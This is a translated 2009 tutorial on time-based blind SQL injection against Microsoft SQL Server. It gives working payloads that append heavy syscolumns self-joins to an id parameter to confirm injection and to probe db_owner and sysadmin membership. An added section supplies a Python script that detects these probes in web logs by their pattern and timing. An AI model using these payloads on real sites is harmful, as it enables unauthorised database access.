Date: 2009-07-04 17:39:00  Source: compiled by this site

Timeout-based MSSQL blind injection [Network technology]


Author: night
Source: www.54rk.cn

Suppose there is a page whose content stays exactly the same no matter what you inject, yet its code really does contain an injection point:
select * from table where columnid = $input_id
Injecting by reading errors returned by the page is impossible here, because the page content never changes. Vulnerable pages like this definitely exist,
and you can build one yourself.

So how do we inject in this case?
We use time-based blind injection.

First look at two statements:

select * from sysobjects where id=1 and (SELECT count(*) FROM syscolumns AS sys1,
syscolumns as sys2,syscolumns AS sys3,syscolumns AS sys4,syscolumns AS sys5,syscolumns AS sys6)>0
and 1=1

select * from sysobjects where id=1 and (SELECT count(*) FROM syscolumns AS sys1,
syscolumns as sys2,syscolumns AS sys3,syscolumns AS sys4,syscolumns AS sys5,syscolumns AS sys6)>0
and 1=2

The first statement is certain to time out; the page should not return a result within half an hour. The second returns a result immediately.
If your test results differ from what I describe, replace
syscolumns as sys2,syscolumns AS sys3,syscolumns AS sys4,syscolumns AS sys5,syscolumns AS sys6
with
syscolumns as sys2,syscolumns AS sys3,syscolumns AS sys4,syscolumns AS sys5,syscolumns AS sys6.....syscolumns AS sys100
100 of them in total; if it still does not time out, your computer must be from another planet.

Now suppose the vulnerable page is http://127.0.0.1/xml/mssql/index.asp?id=1

We inject like this:


http://127.0.0.1/xml/mssql/index.asp?id=1  and (SELECT count(*) FROM syscolumns AS sys1,
syscolumns as sys2,syscolumns AS sys3,syscolumns AS sys4,syscolumns AS sys5,syscolumns AS sys6)>0
and 1=1

http://127.0.0.1/xml/mssql/index.asp?id=1  and (SELECT count(*) FROM syscolumns AS sys1,
syscolumns as sys2,syscolumns AS sys3,syscolumns AS sys4,syscolumns AS sys5,syscolumns AS sys6)>0
and 1=2

If the response times differ greatly, then there is definitely an injection. Now we determine the privileges.

http://127.0.0.1/xml/mssql/index.asp?id=1  and (SELECT count(*) FROM syscolumns AS sys1,
syscolumns as sys2,syscolumns AS sys3,syscolumns AS sys4,syscolumns AS sys5,syscolumns AS sys6)>0
and 1=(SELECT IS_MEMBER('db_owner'))

http://127.0.0.1/xml/mssql/index.asp?id=1  and (SELECT count(*) FROM syscolumns AS sys1,
syscolumns as sys2,syscolumns AS sys3,syscolumns AS sys4,syscolumns AS sys5,syscolumns AS sys6)>0
and 1=(SELECT IS_MEMBER('sysadmin'))

For other injections, refer to the other tutorials online.
You only need to change the and 1=(SELECT IS_MEMBER('sysadmin')) part.

Because if your condition is false, the
(SELECT count(*) FROM syscolumns AS sys1,
syscolumns as sys2,syscolumns AS sys3,syscolumns AS sys4,syscolumns AS sys5,syscolumns AS sys6)>0
check is never entered; if your condition is true, the
(SELECT count(*) FROM syscolumns AS sys1,
syscolumns as sys2,syscolumns AS sys3,syscolumns AS sys4,syscolumns AS sys5,syscolumns AS sys6)>0
check runs to completion.
So if the page times out, your condition holds
and you have guessed the information correctly. If it does not time out, your guessed condition is wrong.
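Added example, not part of the article: a small Python log-triage script that looks for the probe pattern described above in constructed IIS-style log lines. It flags id values that are not plain integers, repeated self-joins of syscolumns, and the response-time gap between the true and false probes. The log layout, the thresholds and the timings are assumptions; only the vulnerable path and the payload shape come from the article.

```python
import re
from urllib.parse import parse_qs

# Constructed IIS W3C-style log lines: date time cs-uri-stem cs-uri-query sc-status time-taken(ms).
# The probe payloads are the heavy self-join queries the article shows; the timings are made up.
SAMPLE_LOG = """\
2009-07-04 17:39:01 /xml/mssql/index.asp id=1 200 31
2009-07-04 17:39:05 /xml/mssql/index.asp id=1+and+(SELECT+count(*)+FROM+syscolumns+AS+sys1,syscolumns+as+sys2,syscolumns+AS+sys3,syscolumns+AS+sys4,syscolumns+AS+sys5,syscolumns+AS+sys6)>0+and+1=1 200 30015
2009-07-04 17:39:36 /xml/mssql/index.asp id=1+and+(SELECT+count(*)+FROM+syscolumns+AS+sys1,syscolumns+as+sys2,syscolumns+AS+sys3,syscolumns+AS+sys4,syscolumns+AS+sys5,syscolumns+AS+sys6)>0+and+1=2 200 28
2009-07-04 17:40:02 /xml/mssql/index.asp id=1+and+(SELECT+count(*)+FROM+syscolumns+AS+sys1,syscolumns+as+sys2,syscolumns+AS+sys3,syscolumns+AS+sys4,syscolumns+AS+sys5,syscolumns+AS+sys6)>0+and+1=(SELECT+IS_MEMBER('sysadmin')) 200 29980
2009-07-04 17:40:33 /xml/mssql/index.asp id=42 200 29
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d+) (\d+)$")
SELF_JOIN_RE = re.compile(r"\bsyscolumns\s+as\s+\w+", re.IGNORECASE)
MIN_JOINS = 3      # assumed threshold: a legitimate id never references syscolumns at all
SLOW_MS = 5000     # assumed threshold: a single-row lookup should answer well under this

def inspect_line(line):
    """Return a finding for one log line, or None when the request looks benign."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    date, clock, stem, query, status, time_taken = m.groups()
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:                       # parse_qs already URL-decodes ('+' -> ' ')
            reasons = []
            if not value.isdigit():                # the vulnerable query expects a bare integer
                reasons.append("non-numeric id")
            joins = len(SELF_JOIN_RE.findall(value))
            if joins >= MIN_JOINS:
                reasons.append(f"{joins} self-joins of syscolumns")
            if int(time_taken) >= SLOW_MS:
                reasons.append(f"slow response ({time_taken} ms)")
            if reasons:
                return {"when": f"{date} {clock}", "path": stem, "param": name,
                        "ms": int(time_taken), "reasons": reasons}
    return None

def analyze(log_text):
    """All findings in a log, plus the timing spread between the self-join probes."""
    findings = [f for f in map(inspect_line, log_text.splitlines()) if f]
    probes = [f["ms"] for f in findings if any("self-joins" in r for r in f["reasons"])]
    spread = max(probes) - min(probes) if len(probes) > 1 else 0
    return findings, spread

if __name__ == "__main__":
    found, spread = analyze(SAMPLE_LOG)
    print(f"{len(found)} suspicious requests, probe timing spread {spread} ms")
```

The large spread between otherwise identical probes is the defender-side signature of the technique: the database actually evaluated the heavy join for one condition and not the other.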

---------- I published this article a long time ago, but nobody ever gave me any feedback.. I wrote it last year
and up to this year there has been no feedback at all; I don't even know whether it contains mistakes.